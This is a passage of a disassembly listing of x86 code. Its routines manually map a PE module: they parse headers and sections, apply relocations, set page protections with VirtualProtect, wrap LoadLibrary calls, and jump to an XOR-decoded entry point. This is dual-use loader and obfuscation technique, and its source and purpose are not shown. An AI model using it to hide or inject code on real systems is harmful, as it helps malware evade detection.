sub_505AD2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_505AE5 proc near ; CODE XREF: sub_5061E1+5DB�p
; sub_5061E1+60F�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
xor edx, edx
div [ebp+arg_4]
mov [ebp+var_4], edx
cmp [ebp+var_4], 0
jz short loc_505B05
mov eax, [ebp+arg_0]
add eax, [ebp+arg_4]
sub eax, [ebp+var_4]
jmp short locret_505B08
; ---------------------------------------------------------------------------
loc_505B05: ; CODE XREF: sub_505AE5+13�j
mov eax, [ebp+arg_0]
locret_505B08: ; CODE XREF: sub_505AE5+1E�j
leave
retn
sub_505AE5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_505B0A proc near ; CODE XREF: sub_505BD7+16C�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 24h
mov eax, [ebp+arg_0]
add eax, [ebp+arg_8]
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
add eax, [ebp+arg_8]
add eax, [ebp+arg_C]
mov [ebp+var_8], eax
loc_505B25: ; CODE XREF: sub_505B0A:loc_505BD0�j
mov eax, [ebp+var_4]
cmp eax, [ebp+var_8]
jnb locret_505BD5
mov eax, [ebp+var_4]
mov eax, [eax]
mov [ebp+var_14], eax
mov eax, [ebp+var_4]
add eax, 4
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov eax, [eax]
mov [ebp+var_10], eax
mov eax, [ebp+var_4]
add eax, 4
mov [ebp+var_4], eax
mov eax, [ebp+var_10]
sub eax, 8
mov [ebp+var_10], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
loc_505B65: ; CODE XREF: sub_505B0A+8B�j
; sub_505B0A+C4�j
mov eax, [ebp+var_4]
cmp eax, [ebp+var_C]
jnb short loc_505BD0
mov eax, [ebp+var_4]
movzx eax, word ptr [eax]
and eax, 0FFFh
mov [ebp+var_24], eax
mov eax, [ebp+var_4]
movzx eax, word ptr [eax]
sar eax, 0Ch
mov [ebp+var_1C], eax
mov eax, [ebp+var_4]
inc eax
inc eax
mov [ebp+var_4], eax
cmp [ebp+var_1C], 0
jnz short loc_505B97
jmp short loc_505B65
; ---------------------------------------------------------------------------
loc_505B97: ; CODE XREF: sub_505B0A+89�j
cmp [ebp+var_1C], 3
jz short loc_505BA7
mov ecx, 0EF000016h
call sub_508342
loc_505BA7: ; CODE XREF: sub_505B0A+91�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_14]
add eax, [ebp+var_24]
mov [ebp+var_20], eax
mov eax, [ebp+arg_4]
mov ecx, [ebp+arg_0]
sub ecx, [eax+34h]
mov eax, [ebp+var_20]
mov eax, [eax]
add eax, ecx
mov [ebp+var_18], eax
mov eax, [ebp+var_20]
mov ecx, [ebp+var_18]
mov [eax], ecx
jmp short loc_505B65
; ---------------------------------------------------------------------------
loc_505BD0: ; CODE XREF: sub_505B0A+61�j
jmp loc_505B25
; ---------------------------------------------------------------------------
locret_505BD5: ; CODE XREF: sub_505B0A+21�j
leave
retn
sub_505B0A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_505BD7 proc near ; DATA XREF: sub_5061E1+C01�o
var_7C = dword ptr -7Ch
var_78 = byte ptr -78h
var_74 = dword ptr -74h
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
; FUNCTION CHUNK AT 00506113 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00506128 SIZE 00000014 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_50E498
push offset sub_4FC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 7Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
and [ebp+var_1C], 0
and [ebp+var_4], 0
cmp [ebp+arg_10], 1
jnz loc_505F4D
mov [ebp+var_4], 1
call sub_5058A0
mov ecx, [ebp+arg_8]
xor ecx, eax
mov [ebp+arg_8], ecx
mov eax, [ebp+arg_C]
mov [ebp+var_24], eax
mov eax, [ebp+var_24]
mov ecx, [ebp+var_24]
add ecx, [eax+3Ch]
mov [ebp+var_40], ecx
mov eax, [ebp+var_40]
movzx eax, word ptr [eax+14h]
mov ecx, [ebp+var_40]
lea eax, [ecx+eax+18h]
mov [ebp+var_34], eax
mov eax, [ebp+var_40]
movzx eax, word ptr [eax+6]
imul eax, 28h
mov ecx, [ebp+var_34]
lea eax, [ecx+eax-28h]
mov [ebp+var_28], eax
mov eax, [ebp+var_28]
mov eax, [eax+0Ch]
mov ecx, [ebp+var_24]
mov eax, [ecx+eax+34h]
mov [ebp+var_44], eax
mov eax, [ebp+var_28]
mov eax, [eax+0Ch]
mov ecx, [ebp+var_24]
mov eax, [ecx+eax+38h]
mov [ebp+var_2C], eax
mov eax, [ebp+var_28]
mov eax, [eax+0Ch]
mov ecx, [ebp+var_24]
mov eax, [ecx+eax+3Ch]
mov [ebp+var_30], eax
mov eax, [ebp+var_28]
mov eax, [eax+0Ch]
mov ecx, [ebp+var_24]
mov eax, [ecx+eax+40h]
mov [ebp+var_38], eax
mov eax, [ebp+var_28]
mov eax, [eax+0Ch]
mov ecx, [ebp+var_24]
lea eax, [ecx+eax+44h]
mov [ebp+var_3C], eax
jmp short loc_505CB7
; ---------------------------------------------------------------------------
loc_505CAE: ; CODE XREF: sub_505BD7:loc_505D2A�j
mov eax, [ebp+var_34]
add eax, 28h
mov [ebp+var_34], eax
loc_505CB7: ; CODE XREF: sub_505BD7+D5�j
mov eax, [ebp+var_34]
cmp eax, [ebp+var_28]
jnb short loc_505D2C
mov eax, [ebp+var_3C]
mov eax, [eax]
mov [ebp+var_50], eax
mov eax, [ebp+var_3C]
add eax, 4
mov [ebp+var_3C], eax
mov eax, [ebp+var_3C]
mov eax, [eax]
mov [ebp+var_4C], eax
mov eax, [ebp+var_3C]
add eax, 4
mov [ebp+var_3C], eax
mov eax, [ebp+var_3C]
add eax, 4
mov [ebp+var_3C], eax
push 0
push 0
push [ebp+var_50]
push [ebp+arg_0]
call sub_500421
lea eax, [ebp+var_48]
push eax
push 0
push 0
push [ebp+var_4C]
mov eax, [ebp+var_34]
mov ecx, [ebp+var_24]
add ecx, [eax+0Ch]
push ecx
push [ebp+arg_0]
call sub_501177
test eax, eax
jz short loc_505D20
cmp [ebp+var_48], 0
jnz short loc_505D2A
loc_505D20: ; CODE XREF: sub_505BD7+141�j
mov ecx, 0EF00000Fh
call sub_508342
loc_505D2A: ; CODE XREF: sub_505BD7+147�j
jmp short loc_505CAE
; ---------------------------------------------------------------------------
loc_505D2C: ; CODE XREF: sub_505BD7+E6�j
mov eax, [ebp+var_40]
mov eax, [eax+34h]
cmp eax, [ebp+var_24]
jz short loc_505D4B
push [ebp+var_2C]
push [ebp+var_44]
push [ebp+var_40]
push [ebp+var_24]
call sub_505B0A
add esp, 10h
loc_505D4B: ; CODE XREF: sub_505BD7+15E�j
push 5Ch
push [ebp+arg_4]
call sub_4FC700
pop ecx
pop ecx
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jnz short loc_505D68
mov eax, [ebp+arg_4]
mov [ebp+var_20], eax
jmp short loc_505D6F
; ---------------------------------------------------------------------------
loc_505D68: ; CODE XREF: sub_505BD7+187�j
mov eax, [ebp+var_20]
inc eax
mov [ebp+var_20], eax
loc_505D6F: ; CODE XREF: sub_505BD7+18F�j
cmp [ebp+var_30], 0
jz short loc_505D97
mov eax, [ebp+var_24]
add eax, [ebp+var_30]
mov [ebp+var_54], eax
push [ebp+var_38]
push 1
push [ebp+var_20]
push [ebp+var_40]
push [ebp+var_24]
push [ebp+var_54]
call sub_504D70
add esp, 18h
loc_505D97: ; CODE XREF: sub_505BD7+19C�j
mov eax, ds:dword_511954
mov [ebp+var_74], eax
cmp [ebp+var_74], 0
jz short loc_505DB8
mov eax, [ebp+var_74]
add eax, 10h
push eax
call ds:dword_50E01C ; RtlEnterCriticalSection
mov [ebp+var_78], 1
jmp short loc_505DBC
; ---------------------------------------------------------------------------
loc_505DB8: ; CODE XREF: sub_505BD7+1CC�j
and [ebp+var_78], 0
loc_505DBC: ; CODE XREF: sub_505BD7+1DF�j
movzx eax, [ebp+var_78]
test eax, eax
jz short loc_505DFB
push offset sub_50BB0D
push ds:dword_5117C0
push [ebp+arg_C]
push [ebp+var_20]
mov ecx, ds:dword_511954
call sub_50B9B1
mov eax, ds:dword_511954
mov [ebp+var_7C], eax
cmp [ebp+var_7C], 0
jz short loc_505DFB
mov eax, [ebp+var_7C]
add eax, 10h
push eax
call ds:dword_50E018 ; RtlLeaveCriticalSection
loc_505DFB: ; CODE XREF: sub_505BD7+1EB�j
; sub_505BD7+215�j
push [ebp+arg_4]
push [ebp+arg_C]
mov ecx, ds:dword_51194C
call sub_50B98E
cmp ds:dword_511680, 2
jb loc_505F35
mov eax, [ebp+var_40]
movzx eax, word ptr [eax+14h]
mov ecx, [ebp+var_40]
lea eax, [ecx+eax+18h]
mov [ebp+var_34], eax
and [ebp+var_58], 0
lea eax, [ebp+var_58]
push eax
push 4
mov eax, [ebp+var_28]
sub eax, [ebp+var_34]
cdq
push 28h
pop ecx
idiv ecx
push eax
push [ebp+var_34]
call ds:dword_5117AC ; VirtualProtect
mov eax, [ebp+var_28]
mov eax, [eax+0Ch]
mov ecx, [ebp+var_24]
lea eax, [ecx+eax+44h]
mov [ebp+var_3C], eax
jmp short loc_505E65
; ---------------------------------------------------------------------------
loc_505E5C: ; CODE XREF: sub_505BD7+32B�j
mov eax, [ebp+var_34]
add eax, 28h
mov [ebp+var_34], eax
loc_505E65: ; CODE XREF: sub_505BD7+283�j
mov eax, [ebp+var_34]
cmp eax, [ebp+var_28]
jnb loc_505F07
mov eax, [ebp+var_3C]
add eax, 8
mov [ebp+var_3C], eax
mov eax, [ebp+var_3C]
mov eax, [eax]
mov [ebp+var_60], eax
mov eax, [ebp+var_3C]
add eax, 4
mov [ebp+var_3C], eax
mov eax, [ebp+var_34]
mov ecx, [ebp+var_60]
mov [eax+24h], ecx
and [ebp+var_5C], 0
mov eax, [ebp+var_60]
and eax, 20000000h
test eax, eax
jz short loc_505EC2
mov eax, [ebp+var_60]
and eax, 80000000h
test eax, eax
jz short loc_505EB9
mov [ebp+var_5C], 40h
jmp short loc_505EC0
; ---------------------------------------------------------------------------
loc_505EB9: ; CODE XREF: sub_505BD7+2D7�j
mov [ebp+var_5C], 20h
loc_505EC0: ; CODE XREF: sub_505BD7+2E0�j
jmp short loc_505EDE
; ---------------------------------------------------------------------------
loc_505EC2: ; CODE XREF: sub_505BD7+2CB�j
mov eax, [ebp+var_60]
and eax, 80000000h
test eax, eax
jz short loc_505ED7
mov [ebp+var_5C], 4
jmp short loc_505EDE
; ---------------------------------------------------------------------------
loc_505ED7: ; CODE XREF: sub_505BD7+2F5�j
mov [ebp+var_5C], 2
loc_505EDE: ; CODE XREF: sub_505BD7:loc_505EC0�j
; sub_505BD7+2FE�j
lea eax, [ebp+var_60]
push eax
push [ebp+var_5C]
mov eax, [ebp+var_34]
mov ecx, [ebp+var_34]
mov eax, [eax+34h]
sub eax, [ecx+0Ch]
push eax
mov eax, [ebp+var_34]
mov ecx, [ebp+var_24]
add ecx, [eax+0Ch]
push ecx
call ds:dword_5117AC ; VirtualProtect
jmp loc_505E5C
; ---------------------------------------------------------------------------
loc_505F07: ; CODE XREF: sub_505BD7+294�j
mov eax, [ebp+var_40]
movzx eax, word ptr [eax+14h]
mov ecx, [ebp+var_40]
lea eax, [ecx+eax+18h]
mov [ebp+var_34], eax
lea eax, [ebp+var_58]
push eax
push [ebp+var_58]
mov eax, [ebp+var_28]
sub eax, [ebp+var_34]
cdq
push 28h
pop ecx
idiv ecx
push eax
push [ebp+var_34]
call ds:dword_5117AC ; VirtualProtect
loc_505F35: ; CODE XREF: sub_505BD7+23C�j
and [ebp+var_4], 0
jmp short loc_505F4B
; ---------------------------------------------------------------------------
loc_505F3B: ; DATA XREF: _6:0050E4A8�o
push [ebp+var_14]
call sub_508C27
retn
; ---------------------------------------------------------------------------
loc_505F44: ; DATA XREF: _6:0050E4AC�o
mov esp, [ebp+var_18]
and [ebp+var_4], 0
loc_505F4B: ; CODE XREF: sub_505BD7+362�j
jmp short loc_505F6F
; ---------------------------------------------------------------------------
loc_505F4D: ; CODE XREF: sub_505BD7+34�j
cmp [ebp+arg_10], 0
jnz short loc_505F62
call sub_5058A0
mov ecx, [ebp+arg_8]
xor ecx, eax
mov [ebp+arg_8], ecx
jmp short loc_505F6F
; ---------------------------------------------------------------------------
loc_505F62: ; CODE XREF: sub_505BD7+37A�j
call sub_5058A0
mov ecx, [ebp+arg_8]
xor ecx, eax
mov [ebp+arg_8], ecx
loc_505F6F: ; CODE XREF: sub_505BD7:loc_505F4B�j
; sub_505BD7+389�j
cmp [ebp+arg_8], 0
jz loc_506115
mov eax, [ebp+arg_C]
add eax, [ebp+arg_8]
mov [ebp+var_64], eax
mov ds:dword_511928, 0FFFFFFFEh
mov eax, ds:dword_511960
mov [ebp+var_68], eax
mov [ebp+var_4], 2
pushaw
mov ds:dword_511960, esp
mov eax, [ebp+arg_14]
push eax
mov eax, [ebp+arg_10]
push eax
mov eax, [ebp+arg_C]
push eax
call [ebp+var_64]
mov ds:dword_511928, eax
mov esp, ds:dword_511960
popaw
and [ebp+var_4], 0
call sub_505FCD
jmp loc_506113
sub_505BD7 endp
; =============== S U B R O U T I N E =======================================
sub_505FCD proc near ; CODE XREF: sub_505BD7+3EC�p
; DATA XREF: _6:0050E4B8�o
mov eax, [ebp-68h]
mov ds:dword_511960, eax
cmp dword ptr [ebp+18h], 0
jnz loc_5060F6
mov eax, ds:dword_51194C
mov [ebp-80h], eax
cmp dword ptr [ebp-80h], 0
jz short loc_506003
mov eax, [ebp-80h]
add eax, 10h
push eax
call ds:dword_50E01C ; RtlEnterCriticalSection
mov byte ptr [ebp-84h], 1
jmp short loc_50600A
; ---------------------------------------------------------------------------
loc_506003: ; CODE XREF: sub_505FCD+1E�j
and byte ptr [ebp-84h], 0
loc_50600A: ; CODE XREF: sub_505FCD+34�j
movzx eax, byte ptr [ebp-84h]
test eax, eax
jz short loc_506047
push dword ptr [ebp+14h]
mov ecx, ds:dword_51194C
call sub_50B8E0
mov eax, ds:dword_51194C
mov [ebp-88h], eax
cmp dword ptr [ebp-88h], 0
jz short loc_506047
mov eax, [ebp-88h]
add eax, 10h
push eax
call ds:dword_50E018 ; RtlLeaveCriticalSection
loc_506047: ; CODE XREF: sub_505FCD+46�j
; sub_505FCD+68�j
push 5Ch
push dword ptr [ebp+0Ch]
call sub_4FC700
pop ecx
pop ecx
mov [ebp-6Ch], eax
cmp dword ptr [ebp-6Ch], 0
jnz short loc_506064
mov eax, [ebp+0Ch]
mov [ebp-6Ch], eax
jmp short loc_50606B
; ---------------------------------------------------------------------------
loc_506064: ; CODE XREF: sub_505FCD+8D�j
mov eax, [ebp-6Ch]
inc eax
mov [ebp-6Ch], eax
loc_50606B: ; CODE XREF: sub_505FCD+95�j
mov eax, ds:dword_511954
mov [ebp-8Ch], eax
cmp dword ptr [ebp-8Ch], 0
jz short loc_506098
mov eax, [ebp-8Ch]
add eax, 10h
push eax
call ds:dword_50E01C ; RtlEnterCriticalSection
mov byte ptr [ebp-90h], 1
jmp short loc_50609F
; ---------------------------------------------------------------------------
loc_506098: ; CODE XREF: sub_505FCD+B0�j
and byte ptr [ebp-90h], 0
loc_50609F: ; CODE XREF: sub_505FCD+C9�j
movzx eax, byte ptr [ebp-90h]
test eax, eax
jz short loc_5060E7
push offset sub_50BB0D
push ds:dword_5117C0
push dword ptr [ebp-6Ch]
mov ecx, ds:dword_511954
call sub_50B900
mov eax, ds:dword_511954
mov [ebp-94h], eax
cmp dword ptr [ebp-94h], 0
jz short loc_5060E7
mov eax, [ebp-94h]
add eax, 10h
push eax
call ds:dword_50E018 ; RtlLeaveCriticalSection
loc_5060E7: ; CODE XREF: sub_505FCD+DB�j
; sub_505FCD+108�j
mov eax, [ebp+0Ch]
mov [ebp-70h], eax
push dword ptr [ebp-70h]
call sub_5083DD
pop ecx
loc_5060F6: ; CODE XREF: sub_505FCD+C�j
mov eax, ds:dword_511928
mov [ebp-1Ch], eax
mov ds:dword_511928, 0FFFFFFFEh
cmp dword ptr [ebp-1Ch], 0FFFFFFFEh
jnz short locret_506112
and dword ptr [ebp-1Ch], 0
locret_506112: ; CODE XREF: sub_505FCD+13F�j
retn
sub_505FCD endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_505BD7
loc_506113: ; CODE XREF: sub_505BD7+3F1�j
jmp short loc_50611C
; ---------------------------------------------------------------------------
loc_506115: ; CODE XREF: sub_505BD7+39C�j
mov [ebp+var_1C], 1
loc_50611C: ; CODE XREF: sub_505BD7:loc_506113�j
or [ebp+var_4], 0FFFFFFFFh
call nullsub_2
jmp short loc_506128
; END OF FUNCTION CHUNK FOR sub_505BD7
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_2. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_505BD7
loc_506128: ; CODE XREF: sub_505BD7+54E�j
mov eax, [ebp+var_1C]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 18h
; END OF FUNCTION CHUNK FOR sub_505BD7
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50613C proc near ; CODE XREF: sub_504DC0+23C�p
; sub_504DC0:loc_50501A�p
push ebp
mov ebp, esp
xor eax, eax
cmp ds:dword_51196C, 0
setnz al
pop ebp
retn
sub_50613C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50614D proc near ; CODE XREF: sub_504DC0:loc_50500A�p
; sub_5061E1:loc_50705C�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = byte ptr -4
push ebp
mov ebp, esp
sub esp, 10h
loc_506153: ; CODE XREF: sub_50614D+89�j
and [ebp+var_4], 0
cmp ds:dword_51196C, 0
jz short loc_5061D0
mov [ebp+var_8], offset dword_51196C
loc_506167: ; CODE XREF: sub_50614D:loc_5061CE�j
mov eax, [ebp+var_8]
cmp dword ptr [eax], 0
jz short loc_5061D0
mov eax, [ebp+var_8]
mov eax, [eax]
mov [ebp+var_C], eax
push 0
push 1
mov eax, [ebp+var_C]
push dword ptr [eax]
mov eax, [ebp+var_C]
push dword ptr [eax+0Ch]
mov eax, [ebp+var_C]
push dword ptr [eax+8]
mov eax, [ebp+var_C]
push dword ptr [eax+4]
call sub_504D70
add esp, 18h
movzx eax, al
test eax, eax
jz short loc_5061C3
mov [ebp+var_4], 1
mov eax, [ebp+var_8]
mov eax, [eax]
mov ecx, [ebp+var_8]
mov eax, [eax+10h]
mov [ecx], eax
mov eax, [ebp+var_C]
mov [ebp+var_10], eax
push [ebp+var_10]
call sub_5083DD
pop ecx
jmp short loc_5061CE
; ---------------------------------------------------------------------------
loc_5061C3: ; CODE XREF: sub_50614D+52�j
mov eax, [ebp+var_8]
mov eax, [eax]
add eax, 10h
mov [ebp+var_8], eax
loc_5061CE: ; CODE XREF: sub_50614D+74�j
jmp short loc_506167
; ---------------------------------------------------------------------------
loc_5061D0: ; CODE XREF: sub_50614D+11�j
; sub_50614D+20�j
movzx eax, [ebp+var_4]
test eax, eax
jnz loc_506153
mov al, [ebp+var_4]
leave
retn
sub_50614D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_5061E1 proc near ; CODE XREF: sub_50931F+2F�p
; sub_50AE2D+2D�p
var_148 = dword ptr -148h
var_144 = dword ptr -144h
var_140 = dword ptr -140h
var_13C = dword ptr -13Ch
var_138 = dword ptr -138h
var_134 = dword ptr -134h
var_130 = dword ptr -130h
var_12C = dword ptr -12Ch
var_128 = dword ptr -128h
var_10C = dword ptr -10Ch
var_104 = dword ptr -104h
var_100 = dword ptr -100h
var_FC = dword ptr -0FCh
var_F8 = dword ptr -0F8h
var_F4 = dword ptr -0F4h
var_F0 = dword ptr -0F0h
var_EC = dword ptr -0ECh
var_E8 = dword ptr -0E8h
var_E4 = dword ptr -0E4h
var_E0 = dword ptr -0E0h
var_DC = dword ptr -0DCh
var_D8 = dword ptr -0D8h
var_D4 = dword ptr -0D4h
var_D0 = dword ptr -0D0h
var_CC = byte ptr -0CCh
var_C8 = dword ptr -0C8h
var_C4 = dword ptr -0C4h
var_C0 = dword ptr -0C0h
var_BC = dword ptr -0BCh
var_B8 = dword ptr -0B8h
var_B4 = dword ptr -0B4h
var_B0 = dword ptr -0B0h
var_AC = dword ptr -0ACh
var_A8 = dword ptr -0A8h
var_A4 = dword ptr -0A4h
var_A0 = dword ptr -0A0h
var_9C = dword ptr -9Ch
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = byte ptr -60h
var_5C = byte ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00506B27 SIZE 00000058 BYTES
; FUNCTION CHUNK AT 00506B8F SIZE 000004F6 BYTES
; FUNCTION CHUNK AT 00507132 SIZE 0000000F BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_50E4C0
push offset sub_4FC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 130h
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov [ebp+var_12C], edx
mov [ebp+var_128], ecx
or [ebp+var_3C], 0FFFFFFFFh
or [ebp+var_38], 0FFFFFFFFh
or [ebp+var_58], 0FFFFFFFFh
and [ebp+var_34], 0
and [ebp+var_30], 0
and [ebp+var_1C], 0
and [ebp+var_2C], 0
and [ebp+var_54], 0
and [ebp+var_4C], 0
and [ebp+var_50], 0
and [ebp+var_40], 0
and [ebp+var_28], 0
and [ebp+var_24], 0
and [ebp+var_5C], 0
and [ebp+var_20], 0
push offset dword_511930
call ds:dword_5116C4 ; RtlEnterCriticalSection
and [ebp+var_48], 0
mov eax, ds:dword_511964
mov [ebp+var_44], eax
and [ebp+var_4], 0
push [ebp+var_128]
call ds:dword_511718 ; GetModuleHandleA
test eax, eax
jz short loc_5062A9
push [ebp+var_128]
call ds:dword_51175C ; LoadLibraryA
push 0FFFFFFFFh
mov [ebp+var_130], eax
lea eax, [ebp+var_10]
push eax
call sub_4FC496
pop ecx
pop ecx
mov eax, [ebp+var_130]
jmp loc_507132
; ---------------------------------------------------------------------------
loc_5062A9: ; CODE XREF: sub_5061E1+9C�j
push [ebp+var_12C]
lea eax, [ebp+var_24]
push eax
push [ebp+var_128]
call sub_50581E
add esp, 0Ch
mov [ebp+var_6C], eax
cmp ds:dword_511964, 0
jz short loc_50632D
cmp [ebp+var_6C], 0
jz short loc_50632D
mov eax, ds:dword_511964
mov [ebp+var_74], eax
jmp short loc_5062F1
; ---------------------------------------------------------------------------
loc_5062DD: ; CODE XREF: sub_5061E1:loc_50632B�j
mov eax, [ebp+var_74]
mov eax, [eax+4]
mov [ebp+var_74], eax
mov eax, ds:dword_511968
inc eax
mov ds:dword_511968, eax
loc_5062F1: ; CODE XREF: sub_5061E1+FA�j
cmp [ebp+var_74], 0
jz short loc_50632D
mov eax, [ebp+var_74]
mov eax, [eax]
cmp eax, [ebp+var_6C]
jnz short loc_50632B
mov eax, ds:dword_511968
inc eax
mov ds:dword_511968, eax
push 0FFFFFFFFh
and [ebp+var_134], 0
lea eax, [ebp+var_10]
push eax
call sub_4FC496
pop ecx
pop ecx
mov eax, [ebp+var_134]
jmp loc_507132
; ---------------------------------------------------------------------------
loc_50632B: ; CODE XREF: sub_5061E1+11E�j
jmp short loc_5062DD
; ---------------------------------------------------------------------------
loc_50632D: ; CODE XREF: sub_5061E1+EA�j
; sub_5061E1+F0�j ...
and ds:dword_511968, 0
mov eax, [ebp+var_6C]
mov [ebp+var_48], eax
lea eax, [ebp+var_48]
mov ds:dword_511964, eax
cmp [ebp+var_6C], 0
jnz loc_5063CE
mov eax, [ebp+var_128]
mov [ebp+var_78], eax
push [ebp+var_12C]
push 0
push [ebp+var_78]
call ds:dword_511758 ; LoadLibraryExA
mov [ebp+var_7C], eax
cmp [ebp+var_7C], 0
jz short loc_50638E
mov eax, [ebp+var_12C]
and eax, 2
test eax, eax
jnz short loc_5063AD
push [ebp+var_128]
push [ebp+var_7C]
call sub_505070
test eax, eax
jnz short loc_5063AD
loc_50638E: ; CODE XREF: sub_5061E1+18C�j
call ds:dword_511710 ; RtlGetLastWin32Error
test eax, eax
jnz short loc_5063A0
push 7Eh
call ds:dword_51178C ; RtlRestoreLastWin32Error
loc_5063A0: ; CODE XREF: sub_5061E1+1B5�j
push [ebp+var_7C]
call ds:dword_5116E0 ; FreeLibrary
and [ebp+var_7C], 0
loc_5063AD: ; CODE XREF: sub_5061E1+199�j
; sub_5061E1+1AB�j
push 0FFFFFFFFh
mov eax, [ebp+var_7C]
mov [ebp+var_138], eax
lea eax, [ebp+var_10]
push eax
call sub_4FC496
pop ecx
pop ecx
mov eax, [ebp+var_138]
jmp loc_507132
; ---------------------------------------------------------------------------
loc_5063CE: ; CODE XREF: sub_5061E1+165�j
push 0
push 0
push [ebp+var_6C]
call sub_508892
add esp, 0Ch
mov [ebp+var_28], eax
push [ebp+var_28]
call ds:dword_511718 ; GetModuleHandleA
mov [ebp+var_80], eax
cmp [ebp+var_80], 0
jz short loc_506413
push 0FFFFFFFFh
mov eax, [ebp+var_80]
mov [ebp+var_13C], eax
lea eax, [ebp+var_10]
push eax
call sub_4FC496
pop ecx
pop ecx
mov eax, [ebp+var_13C]
jmp loc_507132
; ---------------------------------------------------------------------------
loc_506413: ; CODE XREF: sub_5061E1+20F�j
mov eax, [ebp+var_24]
mov [ebp+var_84], eax
jmp short loc_50642B
; ---------------------------------------------------------------------------
loc_50641E: ; CODE XREF: sub_5061E1:loc_50644F�j
mov eax, [ebp+var_84]
inc eax
mov [ebp+var_84], eax
loc_50642B: ; CODE XREF: sub_5061E1+23B�j
mov eax, [ebp+var_84]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_506451
mov eax, [ebp+var_84]
movsx eax, byte ptr [eax]
cmp eax, 2Fh
jnz short loc_50644F
mov eax, [ebp+var_84]
mov byte ptr [eax], 5Ch
loc_50644F: ; CODE XREF: sub_5061E1+263�j
jmp short loc_50641E
; ---------------------------------------------------------------------------
loc_506451: ; CODE XREF: sub_5061E1+255�j
push 0
lea eax, [ebp+var_3C]
push eax
push 0
push 0
push [ebp+var_24]
call sub_500346
test eax, eax
jnz short loc_506477
cmp [ebp+var_3C], 0
jnz short loc_506477
mov ecx, 0EF00000Fh
call sub_508342
loc_506477: ; CODE XREF: sub_5061E1+284�j
; sub_5061E1+28A�j
lea eax, [ebp+var_60]
push eax
push [ebp+var_3C]
call sub_500672
push 40h
call sub_50835A
pop ecx
mov [ebp+var_F4], eax
mov eax, [ebp+var_F4]
mov [ebp+var_50], eax
lea eax, [ebp+var_64]
push eax
push 0
push 0
push 40h
push [ebp+var_50]
push [ebp+var_3C]
call sub_501177
test eax, eax
jz short loc_5064B9
cmp [ebp+var_64], 0
jnz short loc_5064C3
loc_5064B9: ; CODE XREF: sub_5061E1+2D0�j
mov ecx, 0EF00000Fh
call sub_508342
loc_5064C3: ; CODE XREF: sub_5061E1+2D6�j
push 0
push 0
mov eax, [ebp+var_50]
push dword ptr [eax+3Ch]
push [ebp+var_3C]
call sub_500421
push 0F8h
call sub_50835A
pop ecx
mov [ebp+var_F8], eax
mov eax, [ebp+var_F8]
mov [ebp+var_4C], eax
lea eax, [ebp+var_64]
push eax
